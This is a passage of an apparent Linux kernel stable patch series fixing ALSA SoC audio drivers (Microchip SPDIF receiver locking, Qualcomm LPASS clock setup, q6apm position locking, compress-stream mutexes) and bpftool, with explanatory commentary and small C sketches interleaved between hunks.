++		ctrl->ulock = !(val & SPDIFRX_RSR_ULOCK);
++	} else {
++		ctrl->ulock = 0;
++	}
++
+ 	uvalue->value.integer.value[0] = ctrl->ulock;
+ 
++	mutex_unlock(&dev->mlock);
++
+ 	return ulock_old != ctrl->ulock;
+ }
+ 
+@@ -643,8 +674,22 @@ static int mchp_spdifrx_badf_get(struct snd_kcontrol *kcontrol,
+ 	u32 val;
+ 	bool badf_old = ctrl->badf;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-	ctrl->badf = !!(val & SPDIFRX_RSR_BADF);
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * The RSR.ULOCK bit holds a wrong value if both pclk and gclk are
++	 * enabled while the receiver is disabled. Thus we take
++	 * dev->trigger_enabled into account here to return the real status.
++	 */
++	if (dev->trigger_enabled) {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++		ctrl->badf = !!(val & SPDIFRX_RSR_BADF);
++	} else {
++		ctrl->badf = 0;
++	}
++
++	mutex_unlock(&dev->mlock);
++
+ 	uvalue->value.integer.value[0] = ctrl->badf;
+ 
+ 	return badf_old != ctrl->badf;
+@@ -656,11 +701,48 @@ static int mchp_spdifrx_signal_get(struct snd_kcontrol *kcontrol,
+ 	struct snd_soc_dai *dai = snd_kcontrol_chip(kcontrol);
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+-	u32 val;
++	u32 val = ~0U, loops = 10;
++	int ret;
+ 	bool signal_old = ctrl->signal;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-	ctrl->signal = !(val & SPDIFRX_RSR_NOSIGNAL);
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * To get the signal we need to have the receiver enabled. It may
++	 * also have been enabled from the trigger() function, so we must
++	 * take care not to disable the receiver while it is running.
++	 */
++	if (!dev->trigger_enabled) {
++		ret = clk_prepare_enable(dev->gclk);
++		if (ret)
++			goto unlock;
++
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_ENABLE);
++
++		/* Wait for RSR.ULOCK bit. */
++		while (--loops) {
++			regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++			if (!(val & SPDIFRX_RSR_ULOCK))
++				break;
++			usleep_range(100, 150);
++		}
++
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_DISABLE);
++
++		clk_disable_unprepare(dev->gclk);
++	} else {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++	}
++
++unlock:
++	mutex_unlock(&dev->mlock);
++
++	if (!(val & SPDIFRX_RSR_ULOCK))
++		ctrl->signal = !(val & SPDIFRX_RSR_NOSIGNAL);
++	else
++		ctrl->signal = 0;
+ 	uvalue->value.integer.value[0] = ctrl->signal;
+ 
+ 	return signal_old != ctrl->signal;
+@@ -685,18 +767,32 @@ static int mchp_spdifrx_rate_get(struct snd_kcontrol *kcontrol,
+ 	u32 val;
+ 	int rate;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-
+-	/* if the receiver is not locked, ISF data is invalid */
+-	if (val & SPDIFRX_RSR_ULOCK || !(val & SPDIFRX_RSR_IFS_MASK)) {
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * The RSR.ULOCK bit holds a wrong value if both pclk and gclk are
++	 * enabled while the receiver is disabled. Thus we take
++	 * dev->trigger_enabled into account here to return the real status.
++	 */
++	if (dev->trigger_enabled) {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++		/* If the receiver is not locked, IFS data is invalid. */
++		if (val & SPDIFRX_RSR_ULOCK || !(val & SPDIFRX_RSR_IFS_MASK)) {
++			ucontrol->value.integer.value[0] = 0;
++			goto unlock;
++		}
++	} else {
++		/* Receiver is not locked, IFS data is invalid. */
+ 		ucontrol->value.integer.value[0] = 0;
+-		return 0;
++		goto unlock;
+ 	}
+ 
+ 	rate = clk_get_rate(dev->gclk);
+ 
+ 	ucontrol->value.integer.value[0] = rate / (32 * SPDIFRX_RSR_IFS(val));
+ 
++unlock:
++	mutex_unlock(&dev->mlock);
+ 	return 0;
+ }
+ 
+@@ -808,11 +904,9 @@ static int mchp_spdifrx_dai_probe(struct snd_soc_dai *dai)
+ 		     SPDIFRX_MR_AUTORST_NOACTION |
+ 		     SPDIFRX_MR_PACK_DISABLED);
+ 
+-	dev->blockend_refcount = 0;
+ 	for (ch = 0; ch < SPDIFRX_CHANNELS; ch++) {
+ 		init_completion(&ctrl->ch_stat[ch].done);
+ 		init_completion(&ctrl->user_data[ch].done);
+-		spin_lock_init(&ctrl->user_data[ch].lock);
+ 	}
+ 
+ 	/* Add controls */
+@@ -827,7 +921,7 @@ static int mchp_spdifrx_dai_remove(struct snd_soc_dai *dai)
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+ 
+ 	/* Disable interrupts */
+-	regmap_write(dev->regmap, SPDIFRX_IDR, 0xFF);
++	regmap_write(dev->regmap, SPDIFRX_IDR, GENMASK(14, 0));
+ 
+ 	clk_disable_unprepare(dev->pclk);
+ 
+@@ -913,7 +1007,17 @@ static int mchp_spdifrx_probe(struct platform_device *pdev)
+ 			"failed to get the PMC generated clock: %d\n", err);
+ 		return err;
+ 	}
+-	spin_lock_init(&dev->blockend_lock);
++
++	/*
++	 * Signal control need a valid rate on gclk. hw_params() configures
++	 * it propertly but requesting signal before any hw_params() has been
++	 * called lead to invalid value returned for signal. Thus, configure
++	 * gclk at a valid rate, here, in initialization, to simplify the
++	 * control path.
++	 */
++	clk_set_min_rate(dev->gclk, 48000 * SPDIFRX_GCLK_RATIO_MIN + 1);
++
++	mutex_init(&dev->mlock);
+ 
+ 	dev->dev = &pdev->dev;
+ 	dev->regmap = regmap;
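
The spdifrx rework above replaces the per-channel spinlocks and the blockend refcount with a single dev->mlock, and has the control getters consult a software trigger_enabled flag rather than reading back MR.RXEN from hardware, whose value tells only half the story while the clocks are up but the receiver is off. A condensed pthread sketch of that pattern, with hypothetical names:

	#include <pthread.h>
	#include <stdbool.h>
	#include <stdio.h>

	struct rx_dev {
		pthread_mutex_t lock;
		bool trigger_enabled;	/* software truth, not a HW readback */
		int last_status;
	};

	static void trigger_start(struct rx_dev *d)
	{
		pthread_mutex_lock(&d->lock);
		/* ...enable IRQs and the receiver here... */
		d->trigger_enabled = true;
		pthread_mutex_unlock(&d->lock);
	}

	/* Control getter: only trust live hardware status while the receiver
	 * actually runs; otherwise report a safe default instead of a stale
	 * register value.
	 */
	static int status_get(struct rx_dev *d)
	{
		int val;

		pthread_mutex_lock(&d->lock);
		val = d->trigger_enabled ? d->last_status : 0;
		pthread_mutex_unlock(&d->lock);
		return val;
	}

	int main(void)
	{
		struct rx_dev d = { .lock = PTHREAD_MUTEX_INITIALIZER,
				    .last_status = 7 };

		printf("idle: %d\n", status_get(&d));		/* 0 */
		trigger_start(&d);
		printf("running: %d\n", status_get(&d));	/* 7 */
		return 0;
	}
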
+diff --git a/sound/soc/codecs/lpass-rx-macro.c b/sound/soc/codecs/lpass-rx-macro.c
+index a9ef9d5ffcc5c..8621cfabcf5b6 100644
+--- a/sound/soc/codecs/lpass-rx-macro.c
++++ b/sound/soc/codecs/lpass-rx-macro.c
+@@ -366,7 +366,7 @@
+ #define CDC_RX_DSD1_CFG2			(0x0F8C)
+ #define RX_MAX_OFFSET				(0x0F8C)
+ 
+-#define MCLK_FREQ		9600000
++#define MCLK_FREQ		19200000
+ 
+ #define RX_MACRO_RATES (SNDRV_PCM_RATE_8000 | SNDRV_PCM_RATE_16000 |\
+ 			SNDRV_PCM_RATE_32000 | SNDRV_PCM_RATE_48000 |\
+@@ -3579,7 +3579,7 @@ static int rx_macro_probe(struct platform_device *pdev)
+ 
+ 	/* set MCLK and NPL rates */
+ 	clk_set_rate(rx->mclk, MCLK_FREQ);
+-	clk_set_rate(rx->npl, 2 * MCLK_FREQ);
++	clk_set_rate(rx->npl, MCLK_FREQ);
+ 
+ 	ret = clk_prepare_enable(rx->macro);
+ 	if (ret)
+@@ -3601,10 +3601,6 @@ static int rx_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_fsgen;
+ 
+-	ret = rx_macro_register_mclk_output(rx);
+-	if (ret)
+-		goto err_clkout;
+-
+ 	ret = devm_snd_soc_register_component(dev, &rx_macro_component_drv,
+ 					      rx_macro_dai,
+ 					      ARRAY_SIZE(rx_macro_dai));
+@@ -3618,6 +3614,10 @@ static int rx_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = rx_macro_register_mclk_output(rx);
++	if (ret)
++		goto err_clkout;
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index 2ef62d6edc302..2449a2df66df0 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -203,7 +203,7 @@
+ #define TX_MACRO_AMIC_UNMUTE_DELAY_MS	100
+ #define TX_MACRO_DMIC_HPF_DELAY_MS	300
+ #define TX_MACRO_AMIC_HPF_DELAY_MS	300
+-#define MCLK_FREQ		9600000
++#define MCLK_FREQ		19200000
+ 
+ enum {
+ 	TX_MACRO_AIF_INVALID = 0,
+@@ -2014,7 +2014,7 @@ static int tx_macro_probe(struct platform_device *pdev)
+ 
+ 	/* set MCLK and NPL rates */
+ 	clk_set_rate(tx->mclk, MCLK_FREQ);
+-	clk_set_rate(tx->npl, 2 * MCLK_FREQ);
++	clk_set_rate(tx->npl, MCLK_FREQ);
+ 
+ 	ret = clk_prepare_enable(tx->macro);
+ 	if (ret)
+@@ -2036,10 +2036,6 @@ static int tx_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_fsgen;
+ 
+-	ret = tx_macro_register_mclk_output(tx);
+-	if (ret)
+-		goto err_clkout;
+-
+ 	ret = devm_snd_soc_register_component(dev, &tx_macro_component_drv,
+ 					      tx_macro_dai,
+ 					      ARRAY_SIZE(tx_macro_dai));
+@@ -2052,6 +2048,10 @@ static int tx_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = tx_macro_register_mclk_output(tx);
++	if (ret)
++		goto err_clkout;
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/lpass-va-macro.c b/sound/soc/codecs/lpass-va-macro.c
+index b0b6cf29cba30..1623ba78ddb3d 100644
+--- a/sound/soc/codecs/lpass-va-macro.c
++++ b/sound/soc/codecs/lpass-va-macro.c
+@@ -1524,16 +1524,6 @@ static int va_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_mclk;
+ 
+-	ret = va_macro_register_fsgen_output(va);
+-	if (ret)
+-		goto err_clkout;
+-
+-	va->fsgen = clk_hw_get_clk(&va->hw, "fsgen");
+-	if (IS_ERR(va->fsgen)) {
+-		ret = PTR_ERR(va->fsgen);
+-		goto err_clkout;
+-	}
+-
+ 	if (va->has_swr_master) {
+ 		/* Set default CLK div to 1 */
+ 		regmap_update_bits(va->regmap, CDC_VA_TOP_CSR_SWR_MIC_CTL0,
+@@ -1560,6 +1550,16 @@ static int va_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = va_macro_register_fsgen_output(va);
++	if (ret)
++		goto err_clkout;
++
++	va->fsgen = clk_hw_get_clk(&va->hw, "fsgen");
++	if (IS_ERR(va->fsgen)) {
++		ret = PTR_ERR(va->fsgen);
++		goto err_clkout;
++	}
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/lpass-wsa-macro.c b/sound/soc/codecs/lpass-wsa-macro.c
+index 5cfe96f6e430e..c0b86d69c72e3 100644
+--- a/sound/soc/codecs/lpass-wsa-macro.c
++++ b/sound/soc/codecs/lpass-wsa-macro.c
+@@ -2451,11 +2451,6 @@ static int wsa_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_fsgen;
+ 
+-	ret = wsa_macro_register_mclk_output(wsa);
+-	if (ret)
+-		goto err_clkout;
+-
+-
+ 	ret = devm_snd_soc_register_component(dev, &wsa_macro_component_drv,
+ 					      wsa_macro_dai,
+ 					      ARRAY_SIZE(wsa_macro_dai));
+@@ -2468,6 +2463,10 @@ static int wsa_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = wsa_macro_register_mclk_output(wsa);
++	if (ret)
++		goto err_clkout;
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/tlv320adcx140.c b/sound/soc/codecs/tlv320adcx140.c
+index 91a22d9279158..530f321d08e9c 100644
+--- a/sound/soc/codecs/tlv320adcx140.c
++++ b/sound/soc/codecs/tlv320adcx140.c
+@@ -925,7 +925,7 @@ static int adcx140_configure_gpio(struct adcx140_priv *adcx140)
+ 
+ 	gpio_count = device_property_count_u32(adcx140->dev,
+ 			"ti,gpio-config");
+-	if (gpio_count == 0)
++	if (gpio_count <= 0)
+ 		return 0;
+ 
+ 	if (gpio_count != ADCX140_NUM_GPIO_CFGS)
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index 35a52c3a020d1..4967f2daa6d97 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -281,6 +281,7 @@ static int fsl_sai_set_dai_fmt_tr(struct snd_soc_dai *cpu_dai,
+ 		val_cr4 |= FSL_SAI_CR4_MF;
+ 
+ 	sai->is_pdm_mode = false;
++	sai->is_dsp_mode = false;
+ 	/* DAI mode */
+ 	switch (fmt & SND_SOC_DAIFMT_FORMAT_MASK) {
+ 	case SND_SOC_DAIFMT_I2S:
+diff --git a/sound/soc/kirkwood/kirkwood-dma.c b/sound/soc/kirkwood/kirkwood-dma.c
+index 700a18561a940..640cebd2983e2 100644
+--- a/sound/soc/kirkwood/kirkwood-dma.c
++++ b/sound/soc/kirkwood/kirkwood-dma.c
+@@ -86,7 +86,7 @@ kirkwood_dma_conf_mbus_windows(void __iomem *base, int win,
+ 
+ 	/* try to find matching cs for current dma address */
+ 	for (i = 0; i < dram->num_cs; i++) {
+-		const struct mbus_dram_window *cs = dram->cs + i;
++		const struct mbus_dram_window *cs = &dram->cs[i];
+ 		if ((cs->base & 0xffff0000) < (dma & 0xffff0000)) {
+ 			writel(cs->base & 0xffff0000,
+ 				base + KIRKWOOD_AUDIO_WIN_BASE_REG(win));
+diff --git a/sound/soc/qcom/qdsp6/q6apm-dai.c b/sound/soc/qcom/qdsp6/q6apm-dai.c
+index ee59ef36b85a6..7f02f5b2c33fd 100644
+--- a/sound/soc/qcom/qdsp6/q6apm-dai.c
++++ b/sound/soc/qcom/qdsp6/q6apm-dai.c
+@@ -8,6 +8,7 @@
+ #include <linux/slab.h>
+ #include <sound/soc.h>
+ #include <sound/soc-dapm.h>
++#include <linux/spinlock.h>
+ #include <sound/pcm.h>
+ #include <asm/dma.h>
+ #include <linux/dma-mapping.h>
+@@ -53,6 +54,7 @@ struct q6apm_dai_rtd {
+ 	uint16_t session_id;
+ 	enum stream_state state;
+ 	struct q6apm_graph *graph;
++	spinlock_t lock;
+ };
+ 
+ struct q6apm_dai_data {
+@@ -62,7 +64,8 @@ struct q6apm_dai_data {
+ static struct snd_pcm_hardware q6apm_dai_hardware_capture = {
+ 	.info =                 (SNDRV_PCM_INFO_MMAP | SNDRV_PCM_INFO_BLOCK_TRANSFER |
+ 				 SNDRV_PCM_INFO_MMAP_VALID | SNDRV_PCM_INFO_INTERLEAVED |
+-				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME),
++				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME |
++				 SNDRV_PCM_INFO_BATCH),
+ 	.formats =              (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S24_LE),
+ 	.rates =                SNDRV_PCM_RATE_8000_48000,
+ 	.rate_min =             8000,
+@@ -80,7 +83,8 @@ static struct snd_pcm_hardware q6apm_dai_hardware_capture = {
+ static struct snd_pcm_hardware q6apm_dai_hardware_playback = {
+ 	.info =                 (SNDRV_PCM_INFO_MMAP | SNDRV_PCM_INFO_BLOCK_TRANSFER |
+ 				 SNDRV_PCM_INFO_MMAP_VALID | SNDRV_PCM_INFO_INTERLEAVED |
+-				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME),
++				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME |
++				 SNDRV_PCM_INFO_BATCH),
+ 	.formats =              (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S24_LE),
+ 	.rates =                SNDRV_PCM_RATE_8000_192000,
+ 	.rate_min =             8000,
+@@ -99,20 +103,25 @@ static void event_handler(uint32_t opcode, uint32_t token, uint32_t *payload, vo
+ {
+ 	struct q6apm_dai_rtd *prtd = priv;
+ 	struct snd_pcm_substream *substream = prtd->substream;
++	unsigned long flags;
+ 
+ 	switch (opcode) {
+ 	case APM_CLIENT_EVENT_CMD_EOS_DONE:
+ 		prtd->state = Q6APM_STREAM_STOPPED;
+ 		break;
+ 	case APM_CLIENT_EVENT_DATA_WRITE_DONE:
++	        spin_lock_irqsave(&prtd->lock, flags);
+ 		prtd->pos += prtd->pcm_count;
++		spin_unlock_irqrestore(&prtd->lock, flags);
+ 		snd_pcm_period_elapsed(substream);
+ 		if (prtd->state == Q6APM_STREAM_RUNNING)
+ 			q6apm_write_async(prtd->graph, prtd->pcm_count, 0, 0, 0);
+ 
+ 		break;
+ 	case APM_CLIENT_EVENT_DATA_READ_DONE:
++	        spin_lock_irqsave(&prtd->lock, flags);
+ 		prtd->pos += prtd->pcm_count;
++		spin_unlock_irqrestore(&prtd->lock, flags);
+ 		snd_pcm_period_elapsed(substream);
+ 		if (prtd->state == Q6APM_STREAM_RUNNING)
+ 			q6apm_read(prtd->graph);
+@@ -253,6 +262,7 @@ static int q6apm_dai_open(struct snd_soc_component *component,
+ 	if (prtd == NULL)
+ 		return -ENOMEM;
+ 
++	spin_lock_init(&prtd->lock);
+ 	prtd->substream = substream;
+ 	prtd->graph = q6apm_graph_open(dev, (q6apm_cb)event_handler, prtd, graph_id);
+ 	if (IS_ERR(prtd->graph)) {
+@@ -332,11 +342,17 @@ static snd_pcm_uframes_t q6apm_dai_pointer(struct snd_soc_component *component,
+ {
+ 	struct snd_pcm_runtime *runtime = substream->runtime;
+ 	struct q6apm_dai_rtd *prtd = runtime->private_data;
++	snd_pcm_uframes_t ptr;
++	unsigned long flags;
+ 
++	spin_lock_irqsave(&prtd->lock, flags);
+ 	if (prtd->pos == prtd->pcm_size)
+ 		prtd->pos = 0;
+ 
+-	return bytes_to_frames(runtime, prtd->pos);
++	ptr =  bytes_to_frames(runtime, prtd->pos);
++	spin_unlock_irqrestore(&prtd->lock, flags);
++
++	return ptr;
+ }
+ 
+ static int q6apm_dai_hw_params(struct snd_soc_component *component,
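The q6apm-dai hunks exist because the DSP event callback and the ALSA .pointer() op race on prtd->pos: one adds the period size in atomic context while the other reads and may wrap it. A standalone sketch of the locking pattern (illustrative names; the lock is assumed to be set up with spin_lock_init() at open time, as the hunk does):

#include <linux/spinlock.h>

struct pos_state {
	spinlock_t lock;
	unsigned int pos;
	unsigned int size;
};

/* Runs from the DSP completion callback (atomic context). */
static void example_period_done(struct pos_state *s, unsigned int count)
{
	unsigned long flags;

	spin_lock_irqsave(&s->lock, flags);
	s->pos += count;
	spin_unlock_irqrestore(&s->lock, flags);
}

/* Runs from .pointer(); the wrap test and the read must be atomic
 * with respect to the update above, or the position can tear. */
static unsigned int example_read_pos(struct pos_state *s)
{
	unsigned long flags;
	unsigned int pos;

	spin_lock_irqsave(&s->lock, flags);
	if (s->pos == s->size)
		s->pos = 0;
	pos = s->pos;
	spin_unlock_irqrestore(&s->lock, flags);

	return pos;
}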
+diff --git a/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c b/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c
+index ce9e5646d8f3a..23d23bc6fbaa7 100644
+--- a/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c
++++ b/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c
+@@ -127,6 +127,11 @@ static int q6apm_lpass_dai_prepare(struct snd_pcm_substream *substream, struct s
+ 	int graph_id = dai->id;
+ 	int rc;
+ 
++	if (dai_data->is_port_started[dai->id]) {
++		q6apm_graph_stop(dai_data->graph[dai->id]);
++		dai_data->is_port_started[dai->id] = false;
++	}
++
+ 	/**
+ 	 * It is recommend to load DSP with source graph first and then sink
+ 	 * graph, so sequence for playback and capture will be different
+diff --git a/sound/soc/sh/rcar/rsnd.h b/sound/soc/sh/rcar/rsnd.h
+index d9cd190d7e198..f8ef6836ef84e 100644
+--- a/sound/soc/sh/rcar/rsnd.h
++++ b/sound/soc/sh/rcar/rsnd.h
+@@ -901,8 +901,6 @@ void rsnd_mod_make_sure(struct rsnd_mod *mod, enum rsnd_mod_type type);
+ 	if (!IS_BUILTIN(RSND_DEBUG_NO_DAI_CALL))	\
+ 		dev_dbg(dev, param)
+ 
+-#endif
+-
+ #ifdef CONFIG_DEBUG_FS
+ int rsnd_debugfs_probe(struct snd_soc_component *component);
+ void rsnd_debugfs_reg_show(struct seq_file *m, phys_addr_t _addr,
+@@ -913,3 +911,5 @@ void rsnd_debugfs_mod_reg_show(struct seq_file *m, struct rsnd_mod *mod,
+ #else
+ #define rsnd_debugfs_probe  NULL
+ #endif
++
++#endif /* RSND_H */
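The rsnd.h change is purely about guard placement: the old #endif terminated the header's include guard before the CONFIG_DEBUG_FS declarations, leaving them outside the guard and exposed to double inclusion. The corrected shape, reduced to a generic example:

#ifndef EXAMPLE_H
#define EXAMPLE_H

/* ... the bulk of the header ... */

#ifdef CONFIG_DEBUG_FS
int example_debugfs_probe(void);
#else
#define example_debugfs_probe NULL
#endif

#endif /* EXAMPLE_H: every inner block closes before the guard does */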
+diff --git a/sound/soc/soc-compress.c b/sound/soc/soc-compress.c
+index 870f13e1d389c..e7aa6f360cabe 100644
+--- a/sound/soc/soc-compress.c
++++ b/sound/soc/soc-compress.c
+@@ -149,6 +149,8 @@ static int soc_compr_open_fe(struct snd_compr_stream *cstream)
+ 	if (ret < 0)
+ 		goto be_err;
+ 
++	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
++
+ 	/* calculate valid and active FE <-> BE dpcms */
+ 	dpcm_process_paths(fe, stream, &list, 1);
+ 	fe->dpcm[stream].runtime = fe_substream->runtime;
+@@ -184,7 +186,6 @@ static int soc_compr_open_fe(struct snd_compr_stream *cstream)
+ 	fe->dpcm[stream].state = SND_SOC_DPCM_STATE_OPEN;
+ 	fe->dpcm[stream].runtime_update = SND_SOC_DPCM_UPDATE_NO;
+ 
+-	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
+ 	snd_soc_runtime_activate(fe, stream);
+ 	mutex_unlock(&fe->card->pcm_mutex);
+ 
+@@ -215,7 +216,6 @@ static int soc_compr_free_fe(struct snd_compr_stream *cstream)
+ 
+ 	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
+ 	snd_soc_runtime_deactivate(fe, stream);
+-	mutex_unlock(&fe->card->pcm_mutex);
+ 
+ 	fe->dpcm[stream].runtime_update = SND_SOC_DPCM_UPDATE_FE;
+ 
+@@ -234,6 +234,8 @@ static int soc_compr_free_fe(struct snd_compr_stream *cstream)
+ 
+ 	dpcm_be_disconnect(fe, stream);
+ 
++	mutex_unlock(&fe->card->pcm_mutex);
++
+ 	fe->dpcm[stream].runtime = NULL;
+ 
+ 	snd_soc_link_compr_shutdown(cstream, 0);
+@@ -409,8 +411,9 @@ static int soc_compr_set_params_fe(struct snd_compr_stream *cstream,
+ 	ret = snd_soc_link_compr_set_params(cstream);
+ 	if (ret < 0)
+ 		goto out;
+-
++	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
+ 	dpcm_dapm_stream_event(fe, stream, SND_SOC_DAPM_STREAM_START);
++	mutex_unlock(&fe->card->pcm_mutex);
+ 	fe->dpcm[stream].state = SND_SOC_DPCM_STATE_PREPARE;
+ 
+ out:
+@@ -623,7 +626,7 @@ int snd_soc_new_compress(struct snd_soc_pcm_runtime *rtd, int num)
+ 		rtd->fe_compr = 1;
+ 		if (rtd->dai_link->dpcm_playback)
+ 			be_pcm->streams[SNDRV_PCM_STREAM_PLAYBACK].substream->private_data = rtd;
+-		else if (rtd->dai_link->dpcm_capture)
++		if (rtd->dai_link->dpcm_capture)
+ 			be_pcm->streams[SNDRV_PCM_STREAM_CAPTURE].substream->private_data = rtd;
+ 		memcpy(compr->ops, &soc_compr_dyn_ops, sizeof(soc_compr_dyn_ops));
+ 	} else {
+diff --git a/sound/soc/soc-topology.c b/sound/soc/soc-topology.c
+index a79a2fb260b87..d68c48555a7e3 100644
+--- a/sound/soc/soc-topology.c
++++ b/sound/soc/soc-topology.c
+@@ -2408,7 +2408,7 @@ static int soc_valid_header(struct soc_tplg *tplg,
+ 		return -EINVAL;
+ 	}
+ 
+-	if (soc_tplg_get_hdr_offset(tplg) + hdr->payload_size >= tplg->fw->size) {
++	if (soc_tplg_get_hdr_offset(tplg) + le32_to_cpu(hdr->payload_size) >= tplg->fw->size) {
+ 		dev_err(tplg->dev,
+ 			"ASoC: invalid header of type %d at offset %ld payload_size %d\n",
+ 			le32_to_cpu(hdr->type), soc_tplg_get_hdr_offset(tplg),
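The topology fix is an endianness bug: payload_size is a fixed little-endian firmware field, and the surrounding code (as the dev_err arguments show) already converts sibling fields with le32_to_cpu() before use. A hedged userspace sketch of the same rule, with invented names:

#include <endian.h>
#include <stddef.h>
#include <stdint.h>

struct fw_hdr {
	uint32_t payload_size;	/* little-endian in the image */
};

static int hdr_fits(const struct fw_hdr *hdr, size_t offset, size_t fw_size)
{
	/*
	 * Convert before comparing: on a big-endian host the raw
	 * field is a byte-swapped number and the bounds check would
	 * pass or fail on garbage.
	 */
	uint32_t payload = le32toh(hdr->payload_size);

	return offset + payload < fw_size;
}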
+diff --git a/tools/bootconfig/scripts/ftrace2bconf.sh b/tools/bootconfig/scripts/ftrace2bconf.sh
+index 6183b36c68466..1603801cf1264 100755
+--- a/tools/bootconfig/scripts/ftrace2bconf.sh
++++ b/tools/bootconfig/scripts/ftrace2bconf.sh
+@@ -93,7 +93,7 @@ referred_vars() {
+ }
+ 
+ event_is_enabled() { # enable-file
+-	test -f $1 & grep -q "1" $1
++	test -f $1 && grep -q "1" $1
+ }
+ 
+ per_event_options() { # event-dir
+diff --git a/tools/bpf/bpftool/Makefile b/tools/bpf/bpftool/Makefile
+index f610e184ce02a..270066aff8bf1 100644
+--- a/tools/bpf/bpftool/Makefile
++++ b/tools/bpf/bpftool/Makefile
+@@ -215,7 +215,8 @@ $(OUTPUT)%.bpf.o: skeleton/%.bpf.c $(OUTPUT)vmlinux.h $(LIBBPF_BOOTSTRAP)
+ 		-I$(or $(OUTPUT),.) \
+ 		-I$(srctree)/tools/include/uapi/ \
+ 		-I$(LIBBPF_BOOTSTRAP_INCLUDE) \
+-		-g -O2 -Wall -target bpf -c $< -o $@
++		-g -O2 -Wall -fno-stack-protector \
++		-target bpf -c $< -o $@
+ 	$(Q)$(LLVM_STRIP) -g $@
+ 
+ $(OUTPUT)%.skel.h: $(OUTPUT)%.bpf.o $(BPFTOOL_BOOTSTRAP)
+diff --git a/tools/bpf/bpftool/prog.c b/tools/bpf/bpftool/prog.c
+index cfc9fdc1e8634..e87738dbffc10 100644
+--- a/tools/bpf/bpftool/prog.c
++++ b/tools/bpf/bpftool/prog.c
+@@ -2233,10 +2233,38 @@ static void profile_close_perf_events(struct profiler_bpf *obj)
+ 	profile_perf_event_cnt = 0;
+ }
+ 
++static int profile_open_perf_event(int mid, int cpu, int map_fd)
++{
++	int pmu_fd;
++
++	pmu_fd = syscall(__NR_perf_event_open, &metrics[mid].attr,
++			 -1 /*pid*/, cpu, -1 /*group_fd*/, 0);
++	if (pmu_fd < 0) {
++		if (errno == ENODEV) {
++			p_info("cpu %d may be offline, skip %s profiling.",
++				cpu, metrics[mid].name);
++			profile_perf_event_cnt++;
++			return 0;
++		}
++		return -1;
++	}
++
++	if (bpf_map_update_elem(map_fd,
++				&profile_perf_event_cnt,
++				&pmu_fd, BPF_ANY) ||
++	    ioctl(pmu_fd, PERF_EVENT_IOC_ENABLE, 0)) {
++		close(pmu_fd);
++		return -1;
++	}
++
++	profile_perf_events[profile_perf_event_cnt++] = pmu_fd;
++	return 0;
++}
++
+ static int profile_open_perf_events(struct profiler_bpf *obj)
+ {
+ 	unsigned int cpu, m;
+-	int map_fd, pmu_fd;
++	int map_fd;
+ 
+ 	profile_perf_events = calloc(
+ 		sizeof(int), obj->rodata->num_cpu * obj->rodata->num_metric);
+@@ -2255,17 +2283,11 @@ static int profile_open_perf_events(struct profiler_bpf *obj)
+ 		if (!metrics[m].selected)
+ 			continue;
+ 		for (cpu = 0; cpu < obj->rodata->num_cpu; cpu++) {
+-			pmu_fd = syscall(__NR_perf_event_open, &metrics[m].attr,
+-					 -1/*pid*/, cpu, -1/*group_fd*/, 0);
+-			if (pmu_fd < 0 ||
